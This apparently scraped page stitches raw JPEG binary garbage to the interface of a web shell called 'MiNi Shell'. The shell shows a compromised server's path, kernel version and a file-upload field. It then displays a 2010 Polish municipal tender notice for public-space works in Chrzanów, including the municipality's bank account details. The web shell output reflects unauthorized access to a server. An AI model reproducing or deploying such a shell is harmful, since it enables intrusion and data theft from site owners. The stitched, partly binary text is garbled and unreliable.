JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100125/21044-N-2010.html

<p class="kh_header"><b>Chrzanów: ZAGOSPODAROWANIE CENTRUM MIEJSCOWOŚCI CHRZANÓW TRZECI I CHRZANÓW CZWARTY</b><br>
<b>Numer ogłoszenia: 21044 - 2010; data zamieszczenia: 25.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Chrzanów , 23-305 Chrzanów, woj. lubelskie, tel. 0-15 87 55 132, faks 0-15 87 55 133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.chrzanow.netbip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ZAGOSPODAROWANIE CENTRUM MIEJSCOWOŚCI CHRZANÓW TRZECI I CHRZANÓW CZWARTY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są roboty budowlane drogowe (przebudowa i budowa chodników, parkingów i placów z kostki brukowej), instalacje elektryczne oświetlenia zewnętrznego, elementy małej architektury (słupki bezpieczeństwa, ławki, kosze na śmieci, tablice informacyjne, stojaki rowerowe, kraty i kosze na drzewa, zadaszenia informacji wizualnej, maszty do flag), zieleń parkowa wysoka (nasadzenie drzew iglastych i liściastych, krzewów iglastych, pnączy) i niska (trawniki i skwery zielone), ogrodzenie części terenu oraz zadaszenie ażurowe, obejmująca dwa zadania:
1)  Zagospodarowanie centrum miejscowości Chrzanów Trzeci na działce nr ewid. 1802
2)  Zagospodarowanie centrum miejscowości Chrzanów Czwarty na działkach nr ewid. 2307/3, 2308, 2125 i 2583.
2. Przedmiot zamówienia dotyczy robót budowlanych na jednym terenie (działki obydwu miejscowości przylegają do siebie), dla których sporządzona jest jedna wspólna dokumentacja projektowa , jednakże ze względu na wymogi finansowania tego typu inwestycji (projekt współfinansowany ze środków Unii Europejskiej - Program Rozwoju Obszarów Wiejskich - Odnowa i Rozwój Wsi) został on podzielony na dwa zadania, które będą odrębnie dokumentowane i rozliczane, o następujących nazwach: 1) Zadanie Nr 1- Zagospodarowanie centrum miejscowości Chrzanów Trzeci; 2) Zadanie Nr 2 - Zagospodarowanie centrum miejscowości Chrzanów Czwarty
3.	Charakterystyka zamówienia:
1) Zadanie Nr 1- Zagospodarowanie centrum miejscowości Chrzanów Trzeci
Przedmiotem zadania jest budowa chodników oraz miejsc postojowych wraz z placem manewrowym w centrum miejscowości Chrzanów Trzeci. W zakres wchodzi również rozbudowa części chodników, placyku z elementami małej architektury oraz oświetlenia ulicznego z zasilaniem kablowym wraz z zielenią parkową. Na terenie będącym przedmiotem opracowania obecnie znajdują się: parking o nawierzchni żużlowej, kilka dużych krzewów oraz trawniki. Teren ten przylega do drogi powiatowej i drogi gminnej. Bezpośrednio przylega też do drugiego zadania - Zagospodarowanie centrum Chrzanowa Czwartego. Zakres robót obejmuje następujące elementy zagospodarowania terenu:
- Chodnik wzdłuż drogi gminnej;
Nowe chodniki zostaną wykończone kostką bazaltową z elementami kostki granitowej.
- Placyk rekreacyjny o nawierzchni z kostki bazaltowej i granitowej, który może służyć jako przestrzeń do zgrupowania osób podczas różnego rodzaju imprez kulturalno-oświatowych;
- 4 miejsca parkingowe wykończone specjalnymi płytami betonowymi, przez które może przesiąkać woda opadowa do gruntu;
- Nowe przestrzenie trawników i skwerów zielonych na miejscu już istniejących;
- Nowe zasadzenia w postaci zieleni niskiej i wysokiej - 2 szt. drzew liściastych ze specjalnymi zabezpieczeniami., 25 szt. drzew iglastych, 58 szt. krzewów iglastych, 654 szt. pnączy;
- Ogrodzenie terenu z elementów panelowych z siatki - 30 szt.;
- Mini zadaszenia służące do odpoczynku oraz jako punkty informacji wizualnej.
Pod zadaszeniem mogą znaleźć lokalizację ławki lub inne elementy małej architektury.
- Kompleksowy system elementów małej architektury rozmieszczonych na całym obszarze w ilości 8 szt. słupków bezpieczeństwa, 3 szt. ławek, 1 szt. koszy na śmieci, 1 szt. stojaków rowerowych, 2 szt. krat i koszów na drzewa, 1 szt. mini zadaszenia punktów informacji wizualnej.
- Oświetlenie uliczne z zasilaniem kablowym, w tym 9 szt. słupów oświetleniowych, na których będzie zamontowane 18 szt. lamp.
Zestawienie powierzchni poszczególnych części zagospodarowania terenu:
- Chodniki - 421,5 m2
- Miejsca postojowe wraz z placami manewrowymi- 295,8 m2
- Zieleń - trawniki - 359,4 m2
- Razem 1.082,7 m2.
2) Zadanie Nr 2 - Zagospodarowanie centrum miejscowości Chrzanów Czwarty
Przedmiotem zadania jest przebudowa chodników oraz miejsc postojowych wraz z placami manewrowymi w centrum miejscowości Chrzanów Czwarty. W zakres wchodzi również rozbudowa części chodników oraz placyku z elementami małej architektury oraz oświetlenia ulicznego z zasilaniem kablowym wraz z zielenią parkową. Na terenie będącym przedmiotem opracowania obecnie znajdują się klomby kwiatowe, kilka dużych krzewów oraz trawniki. Teren objęty opracowaniem jest terenem wznoszącym się w kierunku północnym, jest terenem, na którym występują budynki użyteczności publicznej. W stanie obecnym w miejscu projektowanego zagospodarowania znajdują się zieleńce; chodniki oraz miejsca postojowe wraz z placami manewrowymi. Chodniki oraz miejsca postojowe posiadają nawierzchnię asfaltową (asfalt lany) oraz z kostki betonowej. Z uwagi na jej stan - odkształcenia poprzeczne i podłużne, wykruszenia i zapadliska, niejednorodność i korozję wymagają w całości rozbiórki. Pod istniejącą nawierzchnią usytuowane są urządzenia i instalacje; kanalizacji deszczowej, sanitarnej, wodociągowej i teletechnicznej, które nie zostaną naruszone.
Zakres robót obejmuje następujące elementy zagospodarowania terenu:
- Kompleksowy system nowych chodników:
Nowe chodniki zostały zaprojektowane na miejscu już istniejących, które są w niezbyt dobrym stanie technicznym. Nowe chodniki zostaną wykończone kostką bazaltową z elementami kostki granitowej. Dodatkowo projektuje się nowe chodniki o szerokości 1,5 m oraz placyk.
- 15 miejsc parkingowych plus jedno dla osób niepełnosprawnych z placykami manewrowymi, które jednocześnie mogą służyć jako przestrzenie do zgrupowania osób podczas różnego rodzaju imprez kulturalno-oświatowych. Nowe miejsca parkingowe zostały zaprojektowane na miejscu już istniejących. Miejsca parkingowe zostaną wykończone specjalnymi płytami betonowymi, przez które może przesiąkać woda opadowa do gruntu.
- Nowe przestrzenie trawników i skwerów zielonych na miejscu już istniejących
- Nowe zasadzenia w postaci zieleni niskiej i wysokiej: - 5 szt. drzew liściastych ze specjalnymi zabezpieczeniami., 41 szt. drzew iglastych, 129 szt. krzewów iglastych.
- Mini zadaszenia służące do odpoczynku oraz jako punkty informacji wizualnej.
Pod zadaszeniem mogą znaleźć lokalizację ławki lub inne elementy małej architektury.
-Kompleksowy system elementów małej architektury rozmieszczonych na całym obszarze w ilości 49 szt. słupków bezpieczeństwa, 6 szt. ławek, 5 szt. koszy na śmieci, 3 szt. tablic informacyjnych, 3 szt. stojaków rowerowych, 5 szt. krat i koszów na drzewa, 1 szt. Mini zadaszenia punktów informacji wizualnej, 2 maszty do wciągania flag z głowicą obrotową i obciążnikiem flagowym.
- Oświetlenie uliczne z zasilaniem kablowym, w tym 14 szt. słupów oświetleniowych, na których będzie zamontowane 28 szt. lamp.
- Zadaszenie ażurowe zlokalizowane przy północnej ścianie budynku remizy strażackiej - pow. 115,6 m2. Pod zadaszeniem mogą znaleźć lokalizację miejsca parkingowe lub tylko przestrzeń wolna od opadów atmosferycznych.
Zestawienie powierzchni poszczególnych części zagospodarowania terenu:
- Chodniki - 567,2 m2
- Miejsca postojowe wraz z placami manewrowymi- 674,2 m2
- Zieleń - trawniki - 836,2 m2
- Razem 2 .077,6 m2.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.91-4, 45.11.12.00-0, 45.22.00.00-5, 45.31.53.00-1, 45.31.61.00-6, 45.11.27.10-5, 77.31.00.00-6, 43.32.50.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1. Ustala się wadium w wysokości: 10.000,00 zł (słownie: dziesięć tysięcy złotych)                                         
2. Wykonawca wnosi wadium w jednej lub kilku następujących formach:
1) pieniężnej
2) poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo-kredytowej z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym; 
3) gwarancji bankowej;
4) gwarancji ubezpieczeniowej, 
5) poręczenia udzielanego przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 z późn. zm.). 
    Wadium wnoszone w pieniądzu należy zgodnie z art. 45 ust 7 ustawy Prawo zamówień publicznych wpłacić wyłącznie przelewem na Rachunek Bankowy Nr 1094101010200220000156003 BS Janów Lubelski o/Chrzanów, w takim terminie, aby najpóźniej przed upływem terminu składania ofert  środki finansowe z tytułu wadium znajdowały się na wskazanym wyżej  rachunku Zamawiającego. 
Pozostałe, niepieniężne formy wadium wymienione w pkt. 2 należy w formie oryginału załączyć do oferty.
Gwarancja bankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna spełniać co najmniej następujące wymogi (pod rygorem wykluczenia wykonawcy):
1) ustalać beneficjenta gwarancji, tj. Gminę Chrzanów,
2) określać kwotę gwarantowaną w zł. (ustaloną w SIWZ),
3) określać termin ważności (wynikający z SIWZ),
4) określać przedmiot gwarancji (wynikający z SIWZ),
5) być gwarancją nie odwoływalną, bezwarunkową, płatną na każde żądanie.
6) z treści gwarancji bankowej lub ubezpieczeniowej powinno wynikać uprawnienie Zamawiającego do zatrzymania wadium jeżeli wystąpią przesłanki opisane w art. 46 ust 4a i 5 Ustawy. 
6. Zwrot wadium nastąpi na zasadach określonych w art. 46 ustawy Prawo zamówień publicznych.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy spełniający warunki udziału w postępowaniu określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (Dz. U. z dnia 29 listopada 2007 r. Nr 223. Poz. 1655 ze zm.). dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek ich posiadania;
2) posiadania wiedzy i doświadczenia;
3) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
4) sytuacji ekonomicznej i finansowej.
2. Ocena spełnienia warunków udziału w postępowaniu będzie przeprowadzona w oparciu o przedłożone przez wykonawców dokumenty i oświadczenia zgodnie z formułą: spełnia/nie spełnia.
3. Jako spełniający warunki udziału w postępowaniu zostaną ocenieni wykonawcy, którzy:
1) w zakresie warunku posiadania wiedzy i doświadczenia - wykażą, że wykonali w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie co najmniej 1 robotę budowlaną o podobnym charakterze do przedmiotu zamówienia (roboty w zakresie zagospodarowania terenu);
2) w zakresie warunku dysponowania osobami zdolnymi do wykonania zamówienia, wykażą, że dysponują co najmniej 1 osobą posiadającą uprawnienia budowlane w zakresie kierowania robotami drogowymi i elektrycznymi;
4. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
5. Z udziału w niniejszym postępowaniu wyklucza się wykonawców, którzy podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 Prawa zamówień publicznych.
6. Zamawiający odrzuca ofertę, jeżeli:
1) jest niezgodna z ustawą,
2) jej treść nie odpowiada treści specyfikacji istotnych warunków zamówienia, z zastrzeżeniem art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych,
3) jej złożenie stanowi czyn nieuczciwej konkurencji w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji,
4) zawiera rażąco niską cenę w stosunku do przedmiotu zamówienia,
5) została złożona przez wykonawcę wykluczonego z udziału w postępowaniu o udzielenie zamówienia,
6) zawiera błędy w obliczeniu ceny,
7) wykonawca w terminie 3 dni od dnia doręczenia zawiadomienia nie zgodził się na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt. 3 Prawa zamówień publicznych,
8) jest nieważna na podstawie odrębnych przepisów,
7. Wykonawcy, którzy nie wykażą spełnienia warunków udziału w postępowaniu podlegać będą wykluczeniu z udziału w postępowaniu. Ofertę wykonawcy wykluczonego uznaje się za odrzuconą.
8. Ocena spełnienia warunków wymaganych od wykonawców prowadzona będzie na podstawie analizy dokumentów i oświadczeń załączonych do oferty według formuły: spełnia/nie spełnia. Oznacza to, że wystarczającym powodem do wykluczenia wykonawcy może być brak w ofercie któregokolwiek z wymaganych, wymienionych w pkt. VI dokumentów lub ich nie uzupełnienie, we wskazanym przez Zamawiającego terminie, w trybie art. 26 ust. 3 ustawy Prawo zamówień publicznych..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. Oświadczenia:
1) Oświadczenie, że Wykonawca spełnienia warunki udziału w postępowaniu (wg załącznika nr 2 do SIWZ) dotyczące:
a) posiadania uprawnień do wykonywania działalności w zakresie objętym przedmiotem zamówienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b) posiadania wiedzy i doświadczenia;
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia;
d) sytuacji ekonomicznej i finansowej.
2) Oświadczenie wykonawcy, o braku podstaw do wykluczenia z postępowania na podstawie art. 24 ust. 1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (wg załącznika nr 3 do SIWZ);
2. W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy należy złożyć następujące dokumenty:
1) Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy -wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w przypadku osób fizycznych oświadczenie w zakresie art. 24 ust. l pkt. 2 ustawy;
2) Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
3) Aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert;
4) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
5) Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
3. W celu wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. l ustawy, których opis sposobu oceny spełniania został podany przez Zamawiającego, należy złożyć następujące dokumenty:
1) Wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia - wykonawca wykaże wykonanie, co najmniej jednej roboty budowlanej o podobnym charakterze, tj. roboty w zakresie zagospodarowania terenu, wykonanej (zakończonej) w ciągu ostatnich pięciu lat, lub krótszym okresie, jeżeli okres działalności wykonawcy jest krótszy. Celem potwierdzenia, że roboty zostały wykonane należycie, zamawiający wymaga załączenia do wszystkich wykazanych robót kserokopii protokołu zakończenia i odbioru robót potwierdzonego/-ych za zgodność z oryginałem przez wykonawcę lub referencji wystawionych przez Zamawiającego którego wykazana realizacja dotyczy   wg załącznika nr 5 do SIWZ;
2) Oświadczenie dotyczące dysponowania osobami zdolnymi do wykonania przedmiotu zamówienia, w tym w tym w szczególności osobą kierownika budowy, posiadającego odpowiednie doświadczenie zawodowe i wymagane uprawnienia do kierowania robotami budowlanymi branży drogowej i elektrycznej wraz z  dokumentami potwierdzającymi posiadanie tych uprawnień - wg załącznika nr 6 do SIWZ);
4. Wykonawca w sytuacji, gdy polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
5. W przypadku robót budowlanych wykonywanych uprzednio w ramach konsorcjum i spółek cywilnych wykaz robót budowlanych określony w pkt. 3.1. winien potwierdzać doświadczenie wykonawcy(ów) składającego(ych) ofertę tzn.: w przypadku zamówienia wykonywanego wspólnie z innym bądź innymi wykonawcami, wykaz powinien wskazywać jedynie zakres i wartość prac wykonanych przez wykonawcę(ów) składającego(ych) ofertę w tym postępowaniu.
6. W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia: 
1) Dokumenty wymagane w pkt. 2 winny być złożone przez każdego wykonawcę;
2) Oświadczenia określone w pkt. 1, dokumenty wymagane w pkt. 3 oraz dokumenty o których mowa w pkt. 4 winny być złożone wspólnie przez wykonawców.
7. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 2.1 - 2.3 i 2.5 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
1) nie otwarto jego likwidacji ani nie ogłoszono upadłości;
2) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3) nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
8. Zamiast dokumentu, o których mowa w pkt. 2.4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt. 4-8 ustawy.
9. Dokumenty, o których mowa w pkt. 7 ppkt.1 i 3 oraz w pkt.8, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt 7 ppkt.2 powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
10. Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 7 i 8. zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjny m albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Zapisy dotyczące terminów wystawienia stosuje się odpowiednio.
11. Wszystkie powyższe dokumenty winny być składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę - poświadczenie winno zawierać zapis odręczny lub w formie pieczęci  - za zgodność z oryginałem.
12. Dokumenty sporządzone w języku obcym należy składać z tłumaczeniem na język polski.
Oferty Wykonawców, którzy przedłożą dokumenty i oświadczenia potwierdzające spełnianie wymaganych warunków zostaną dopuszczone do badania i oceny..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.chrzanow.netbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 1. www.chrzanow.woi.lublin.pl 
2. Na wniosek Wykonawcy Specyfikację istotnych warunków zamówienia można uzyskać również: 
a) w siedzibie zamawiającego-pok. nr 9
b) za pośrednictwem poczty..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2010 godzina 08:45, miejsce: Ofertę należy złożyć /przesłać pocztą/ do siedziby Zamawiającego - Urząd Gminy Chrzanów, Chrzanów Trzeci nr 112, 23-305 Chrzanów,pok. Nr 1 przy czym liczy się termin faktycznego wpłynięcia oferty..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com